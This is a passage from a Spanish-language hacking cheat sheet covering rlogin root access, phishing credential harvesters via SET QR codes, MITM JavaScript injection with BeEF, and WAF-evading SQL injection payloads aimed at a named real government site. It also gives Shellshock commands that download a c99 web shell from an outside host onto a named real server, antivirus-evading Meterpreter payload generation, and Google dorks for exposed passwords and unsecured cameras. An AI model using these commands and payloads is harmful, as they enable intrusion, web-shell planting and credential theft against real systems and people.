2113# apt-get install rsh-client
2114
2115Y conectar... sin credenciales ni nada.
2116
2117# rlogin -l root IP
2118
2119
2120
2121
2122**********************************************************************
2123**********************************************************************
2124***** INGERIERÃA SOCIAL CONSTRUIR PERFIL
2125**********************************************************************
2126**********************************************************************
2127
2128Metasploit nos brinda un módulo para buscar todos los correos electrónicos de un sitio, con poco trabajo.
2129
2130msf> use auxiliary/gather/search_email_collector
2131msf> info
2132msf> set DOMAIN sitio-vÃctima.com
2133msf> run
2134
2135
2136**********************************************************************
2137**********************************************************************
2138***** ATAQUES CON CÓDIGO QR
2139**********************************************************************
2140**********************************************************************
2141
2142Abremimos la herramienta setoolkit, un framework de ingenierÃa social
2143
2144# setoolkit
2145
2146Selecciona Website Attack Vectors
21472) Website Attack Vectors.
2148
2149Ahora elegiremos Credential Harvester Attack Method.
21503) Credential Harvester Attack Method.
2151
2152Seleccione una de las plantillas existentes Facebook
21531) Web Templates
21544) Facebook
2155
2156Generar el QR malicioso
21579) theQRCode Generator Attack Vector.
2158
2159Ahora debes introducir tu dirección IP o url, ya que hemos establecido el oyente con esta dirección.
2160
2161
2162**********************************************************************
2163**********************************************************************
2164***** INYECTAR JS MALICIOSO MITM
2165**********************************************************************
2166**********************************************************************
2167El Javascript malicioso lo conseguiremos con el framework beef
2168mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.14 -- inject --js-url http://192.168.1.10:3000/hook.js
2169
2170
2171
2172
2173
2174
2175**********************************************************************
2176**********************************************************************
2177***** DETECTAR MALWARE CON WIRESHARK
2178**********************************************************************
2179**********************************************************************
2180
2181Una buena práctica para ver que todo va bien, es analizar el tráfico de nuestra red, para ello podemos usar wireshark
2182
2183# wireshark
2184
2185Los filtros más usados son:
2186
2187dns
2188http.request
2189smtp.req.parameter && contains "FROM"
2190smtp.data.fragment
2191
2192
2193Para obtener toda la secuencia del paquete completo coloca el cursor sobre el propio paquete y en el menú contextual elegir la opción de "follow tcp stream".
2194
2195
2196
2197**********************************************************************
2198**********************************************************************
2199***** Esteganografia
2200**********************************************************************
2201**********************************************************************
2202
2203# apt-get install steghide
2204
2205Para ocultar el fichero basta con usar el siguiente comando
2206
2207# steghide embed -ef (pathfile) -cf (pathfile)
2208
2209Para extraerlo
2210
2211# steghide extract -sf (pathfile)
2212
2213
2214
2215
2216**********************************************************************
2217***** EVADIR WAF EN LA WEB
2218**********************************************************************
2219**********************************************************************
2220
2221URL normal
2222http://bpc.gov.bd/contactus.php?id=4
2223
2224Detectado por MOD Security
2225http://bpc.gov.bd/contactus.php?id=4′ UNION SELECT 1,2,3– –
2226
2227---
2228
2229Sin detección:
2230http://bpc.gov.bd/contactus.php?id=.4’/*!50000UNION*//*!50000SELECT*/1,2,3,4,5,6,7– –
2231
2232DETECTANDO FIREWALL DE LA APLICACIÓN WEB USANDO NMAP
2233nmap -p80 –script http-Web Application Firewall-detect <host>
2234
2235
2236FINGERPRINTING WAF USANDO NMAP
2237nmap -p80 –script http-WAF-fingerprint <host>
2238
2239FINGERPRINTING WAF USANDO WAFW00F
2240WAFw00f.py <url>
2241
2242DIFERENTES TIPOS DE CODIFICACIÓN
2243
22441 or 1=1
22451′ or â€=’
22461″ or “â€=â€
22471′ or true#
22481″ or true#
22491 or true#
2250etc.
2251
2252---
2253
2254or ‘1
2255|| ‘1
2256null’ || ‘a’=_binary’a
22571′ || ‘a’=x’61
22581′ && ‘0’=x’30
22591′ %26%26 %270%27%3dx’30
22602′ && 0.e1=_binaryâ€0
22611 or 1.e1=0b1010
2262‘ || 1 like 1
2263‘-‘
2264“-“
2265‘ || 2 not like 1
2266110 or x’30’=48
2267‘1’!=20
22681 or 20!=’1′
22692 and 2>0
22703 || 0<1
227112 || 0b1010<0b1011
22720b11 || 0b1010x’30’
22731 or 0b1
22742121/**/||21
2275111′ or _binary’1
22761 or 2121
22771′ or 12 rlike ‘1
2278
2279Mezclándolas hasta que puede generar miles de diferente payloads y técnicas.
2280
2281Aquà hemos utilizado la codificación Binary, Hex, asà como algunas palabras clave para hackear. En realidad firewall de aplicación web detecta cualquier cosa maliciosa utilizando el conjunto de reglas definidas. Por lo que necesitamos generar algo diferente para confundirlos.
2282
2283Binary
2284Select 1 from dual where 0b1010=10
2285Hex Type 1
2286Select 1 from dual where ‘0’=x’30’
2287Hex Type 2
2288Select 1 from dual where 0x30=’0′
2289Like statement
2290Select 1 from dual where 1 like 1
2291Rlike Statement
2292Select 1 from dual where 12 rlike 1
2293|| (OR)
2294Select 1 from dual where 1||1
2295&& (And)
2296Select 1 from dual where 1&&1
2297
2298
2299Los siguientes son algunos ejemplos de URL codificada para hackear WAF:
2300
2301%55nion(%53elect)
2302union%20distinct%20select
2303union%20%64istinctRO%57%20select
2304union%2053elect
2305%23?%0auion%20?%23?%0aselect
2306%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
2307%55nion %53eLEct
2308u%6eion se%6cect
2309unio%6e %73elect
2310unio%6e%20%64istinc%74%20%73elect
2311uni%6fn distinct%52OW s%65lect
2312%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
2313
2314
2315
2316aquà se asume un firewall de aplicaciones web se ha bloqueado o filtrada uso de ‘0x’ para filtrar uso de hex en tu inyección y comillas simples o dobles no están permitidos. Incluso a veces los firewalls de aplicaciones web usan para descodificar Hex de solicitudes y comprobar si hay contenido malicioso. Podemos tratar las siguientes formas de superar la situación.
2317
2318Normal Hex (Blocked)
2319select 0x313131
2320Hexed Bypass Version
2321select x’313131′;
2322Binary Bypass
2323select 0b011110100110010101101110;
2324Bypass using functions
2325select unhex(x’333133313331′);
2326
2327
2328**********************************************************************
2329**********************************************************************
2330***** shellshock
2331**********************************************************************
2332**********************************************************************
2333
2334Atacar shell remota con shellshock, aprovechando cgi
2335$ curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
2336
2337proxychains curl -A "() { :; }; wget http://www.r57shell.net/shell/c99.txt;mv c99.txt c.php" http://huttradio.co.nz/cgi-sys/defaultwebpage.cgi
2338
2339
2340
2341**********************************************************************
2342**********************************************************************
2343***** THE FATRAT
2344**********************************************************************
2345**********************************************************************
2346
2347Añadimos a nuestro fichero sources.list el siguiente repositorio
2348
2349deb http://old.kali.org/kali sana main non-free contrib
2350
2351# nano /etc/apt/sources.list
2352
2353# apt-get update
2354
2355# apt-get install mingw32
2356
2357git clone https://github.com/Screetsec/TheFatRat.git
2358
2359cd Fatrat
2360
2361chmod +x fatrat
2362
2363chmod +x powerfull.sh
2364
2365
2366Ahora vamos a ejecutarlo.
2367
2368./farat
2369
2370
2371**********************************************************************
2372**********************************************************************
2373***** GENERANDO PAYLOAD DE MANERA AUTOMÃTICA (EVADIR ANTIVIRUS)
2374**********************************************************************
2375**********************************************************************
2376Crea un binario con un Meterpreter inverso TCP inyectado
2377
2378Lo puedes descargar desde: https://github.com/lorentzenman/payday/blob/master/payday.py
2379
2380# python payday.py –veil –msf –ip [dirección IP atacante].
2381
2382
2383**********************************************************************
2384**********************************************************************
2385***** HACKING CON BUSCADORES
2386**********************************************************************
2387**********************************************************************
2388
2389Dorks:
2390
2391/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
2392filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana
2393
2394“Index of†/ “chat/logsâ€
2395Muestra los de chats.
2396
2397filetype:sql “MySQL dump†(pass|password|passwd|pwd)
2398Busca base de datos (copias de seguridad) MySQL donde se encuentren registros del tipo pass|password|passwd|pwd.
2399
2400site:gov filetype:doc allintitle:restricted
2401Acceso a ficheros del gobierno restringidos.
2402
2403inurl:intranet filetype:doc confidential
2404Busca documentos de caracter sensible en cualquier web
2405
2406“robots.txt†“disallow:†filetype:txt
2407El fichero robots.txt contiene información que no queremos que indexen los buscadores. Vamos a ver que direcciones son...
2408
2409inurl:â€ViewerFrame?Mode=â€
2410Camaras ip online
2411
2412ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-“
2413Usuarios y claves de administradores, para modificar la web. Se ven directamente en Google, sin necesidad de entrar en la página. Hay más de 1.100 claves asà en Google
2414
2415
2416filetype:sql “# dumping data for table†“`PASSWORD` varcharâ€
2417Bases de datos sql volcadas completas, tienen datos de usuarios y contraseñas. Se pueden hacer modificaciones en la cadena de búsqueda, para sacar otros tipos de información. Aquà un ejemplo de contraseñas de la Universidad de Vigo. Las contraseñas van encriptadas en md5, pero basta buscar en Google la contraseña y el hacker encontrará un foro donde alguien la ha desencriptado y sale la original. Pongo un recuadro negro en los e-mails 😉
2418
2419intitle:â€index of†“Index of /†password.txt
2420Servidores con un archivo llamado password.txt. Se puede centrar por paÃses con site:.es o por páginas educativas con site:.edu
2421
2422filetype:inc intext:mysql_connect password -please -could -port
2423Google nos da más de 2.000 usuarios y contraseñas de bases de datos MySQL
2424
2425filetype:sql “MySQL dump†(pass|password|passwd|pwd)
2426Más contraseñas disponibles en bases de datos
2427“there are no administrators accounts yet†“create the Super User†inurl:admin.php Instalaciones de php nuke a mitad de proceso, que nos piden que elijamos la contraseña de administrador.
2428
2429
2430“access denied for user†“using password†“general error†-inurl:phpbb “sql errorâ€
2431Foros phpbb que dan errores. Nos dan el nombre del usuario y a veces también la IP del servidor. En Google aparecen más de 340.000 foros vulnerables.
2432
2433“SquirrelMail version 1.4.4†inurl:src ext:php
2434Una versión muy mala y fáclmente jaqueable del gestor de correo. En Goolge aparecen 1940 empresas con ese gestor de correo, es como si dicen: “hackéame, mira mis correosâ€
2435
2436
2437“Powered by MercuryBoard [v1â€
2438Versión antigua y con agujeros de seguridad de este software para envÃo de boletines. 188.000 resultados nos da Google.
2439
2440intitle:â€Welcome to Windows Small Business Server 2003″
2441Google muestra 17.000 servidores con esta versión anticuada de Windows Server, el hacker no sabe por cuál empezar…
2442
2443intitle:index.of “Apache/*†“server atâ€
2444Da más de 500 millones de resultados en Google. Busca servidores Apache. Poniendo en lugar del * una versión con vulnerabilidades, el hacker sabe en qué servidores puede entrar.
2445
2446intitle:index.of “Microsoft-IIS/* server atâ€
2447Igual que el anterior, aunque este muestra “sólo†600.000 servidores, con sus versiones correspondientes.
2448
2449
2450camera linksys inurl:main.cgi
2451700 cámaras disponibles para que un hacker nos vea. No hace falta contraseña, para entrar
2452
2453inurl:â€ViewerFrame?Mode=â€
245483.000 cámaras disponibles para espiar sin necesidad de contraseña
2455
2456“active webcam page†inurl:
24578080 Más cámaras disponibles en el puerto 8080
2458
2459intitle:â€toshiba network camera – User Loginâ€
246015.000 cámaras más
2461
2462intitle:â€ivista main pageâ€
2463más cámaras
2464
2465intitle:â€i-catcher console†“please visitâ€
2466y más todavÃa
2467
2468inurl:webarch/mainframe.cgi
2469Impresoras listas para administrar remotamente
2470
2471intitle:â€network print server†filetype:shtm
2472y más impresoras esperando a hackers
2473
2474filetype:sql “# dumping data for table†“`PASSWORD` varcharâ€
2475Bases de datos sql volcadas completas, podemos ver datos de usuarios, contraseñas y muchos otros datos. Incluso se podria hacer modificaciones en la url de busqueda para sacar mas informacion.
2476
2477“access denied for user†“using password†“general error†-inurl:phpbb “sql errorâ€
2478Un conocido error de algunas versiones de Phpbb que nos muestra un error web que indica el nombre del usuario administrador.. con esto podemos hacer un ataque de fuerza bruta o diccionario solo para la contraseña
2479
2480ext:sql intext:@gmail.com intext:password
2481Buscara archivo .sql que contengan en algun lado un correoen gmail y un campo password
2482
2483Puedes encontrar muchos más en: https://www.exploit-db.com/google-hacking-database/
2484
2485
2486### Enlaces de dorks:
2487
2488http://www.cxsecurity.com
2489https://www.exploit-db.com/google-hacking-database/
2490
2491
2492
2493**********************************************************************
2494**********************************************************************
2495***** TOR RELAY
2496**********************************************************************
2497**********************************************************************
2498
2499Primero es necesario instalar tor.
2500
2501# apt-get install tor
2502
2503Ahora necesitamos modificar el fichero de configuración de tor /etc/tor/torrc
2504——
2505ORPort 443
2506Nickname “nicknameâ€
2507ContactInfo “email addressâ€
2508ExitPolicy reject *:* # no exits allowed
2509——
2510
2511
2512Es importante limitar el ancho de banda
2513——
2514RelayBandwidthRate 300 KB
2515RelayBandwidthBurst 500 KB
2516——
2517
2518También es importante indicar el puerto de control de relay
2519——
2520ControlPort 9051
2521CookieAuthentication 1
2522——
2523
2524Iniciamos el demos de tor
2525
2526# /etc/init.d/tor start
2527
2528Chequeamos que el servicio esté ok
2529
2530# netstat -atnp | grep 443
2531tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 3662/tor
2532
2533Ahora podremos ver el log de tor
2534
2535# tail -f /var/log/tor/log
2536
2537Busca la linea: "Self-testing indicates your ORPort is reachable from the outside. Excellent. Publishing server descriptor"
2538
2539Si no la encuentras, posiblemente tendrás que abrir los puertos o mirar la configuración del firewall.
2540
2541Ahora instalaremos la ARM t00l
2542——
2543$ wget https://www.atagar.com/arm/resources/static/arm-1.4.5.0.tar.bz2
2544pi@raspberrypi~$ tar xjvf arm-1.4.5.0.tar.bz2
2545pi@raspberrypi~$ cd arm
2546pi@raspberrypi~$ sudo ./install
2547——
2548Y para ejecutarla
2549
2550$ sudo -u debian-tor arm
2551
2552Ahora podremos mirar el mapa para ver si nuestro relay está en marcha. Esto puede tomar unas 24h?…
2553
2554### https://www.devconsole.info/?p=879
2555
2556
2557
2558**********************************************************************
2559**********************************************************************
2560***** DETECTAR 0-DAYS EN PHP
2561**********************************************************************
2562**********************************************************************
2563
2564¿Que debemos buscar?…
2565Para empezar podemos hacerlo, buscando las variables que suelen usarse para la inyección.
2566
2567$_GET
2568Un array asociativo de variables pasadas al script actual a través de los parámetros de URL.
2569http://php.net/manual/en/reserved.variables.get.php
2570
2571$_POST
2572Un array asociativo de variables pasadas al script actual mediante el método HTTP POST
2573http://php.net/manual/en/reserved.variables.post.php
2574
2575$_REQUEST
2576Una matriz asociativa que contiene por defecto el contenido de $ _GET, $ _POST y $ _COOKIE.
2577http://php.net/manual/en/reserved.variables.request.php
2578
2579$_COOKIE
2580Un array asociativo de variables pasadas al script actual a través de cookies HTTP.
2581http://php.net/manual/en/reserved.variables.cookies.php
2582
2583$_SERVER
2584$ _SERVER - $ HTTP_SERVER_VARS [obsoleta] - Información del servidor y entorno de ejecución.
2585http://php.net/manual/en/reserved.variables.server.php
2586
2587$_FILES
2588Una matriz asociativa de artÃculos subidos al script actual a través del método HTTP POST.
2589http://php.net/manual/en/reserved.variables.files.php
2590
2591Buscar include en app.php
2592
2593$ grep include app.php
2594
2595Buscar include en todos los archivos php
2596
2597$ grep include *.php
2598
2599Si queremos ver el número de linea
2600
2601$grep include *.php -n
2602
2603Comprobar si se encuentra ‘SELECT’ y ‘FROM’
2604
2605$ grep 'SELECT\|FROM' app.php -n
2606
2607Ignorar Case Sensitive
2608
2609$ grep 'sEleCt\|FroM' app.php -n -i
2610
2611Otras posibles búsquedas
2612
2613$ grep "\$_GET" dymy_ua.php -i -n
2614$ grep "\$_GET" dymy_ua.php -i -n
2615$ grep "mysql_" dymy_ua.php -i -n
2616$ grep "include" dymy_ua.php -i -n
2617
2618Buscar variables $db
2619
2620$ grep "\$db" dymy_ua.php -i -n
2621
2622
2623
2624**********************************************************************
2625**********************************************************************
2626***** FAIL2BAN
2627**********************************************************************
2628**********************************************************************
2629
2630Muestra las ip de los equipos baleados con su id, para posteriormente poder matarlo.
2631# iptables -L --line-number
2632
2633Identificamos la lÃnea (número) de nuestra IP dentro de las reglas fail2ban-ssh
2634# iptables -D fail2ban-ssh < número >
2635
2636
2637**********************************************************************
2638**********************************************************************
2639***** UTILES PARA LA RED
2640**********************************************************************
2641**********************************************************************
2642Cómo identificar el proceso que está usando un puerto TCP determinado
2643
2644$ netstat -nepal|grep 8080
2645tcp 0 0 :::8080 :::* LISTEN 10404 18906159 7952/java
2646
2647Ver los puertos y los procesos que lo ejecutan
2648$ netstat -lnp
2649
2650
2651
2652
2653**********************************************************************
2654**********************************************************************
2655***** LEER BINARIOS
2656**********************************************************************
2657**********************************************************************
2658
2659$ tweak -f ~/t00ls/Firewall/BANANAGLEE/BANANAUSURPER/BG3000_UPGRADE/UPGRADE/BUSURPER-3001-701.exe
2660
2661Otra herramienta para leer binarios y examinarlos, es bless
2662
2663Para ello usamos el comando
2664
2665# bless
2666
2667Hexdump: Como parametro (en ambos) pasamos el nombre del fichero a ver/editar.
2668
2669$ hexdump -C “nombre del fichero binario a examinarâ€
2670
2671
2672**********************************************************************
2673**********************************************************************
2674***** LINKS DE UTILIDAD
2675**********************************************************************
2676**********************************************************************
2677
2678https://www.exploit-db.com/ = Base de datos Exploits
2679https://packetstormsecurity.com/ = Base de datos Exploits
2680http://ebook-dl.com/computer/internet-web-culture/hacking/ = Libros de hacking
2681http://www.routerpasswords.com = Passwords por defectos de dispositivos
2682http://j5dtyooqyukedkrl.onion/private
2683
2684#referencias
2685https://seguridadyredes.wordpress.com/2010/09/23/snort-formato-tipos-e-interpretacion-de-las-alertas-actualizacion/
2686https://pentestlab.wordpress.com
2687
2688#videos
2689https://www.youtube.com/watch?v=7nF2BAfWUEg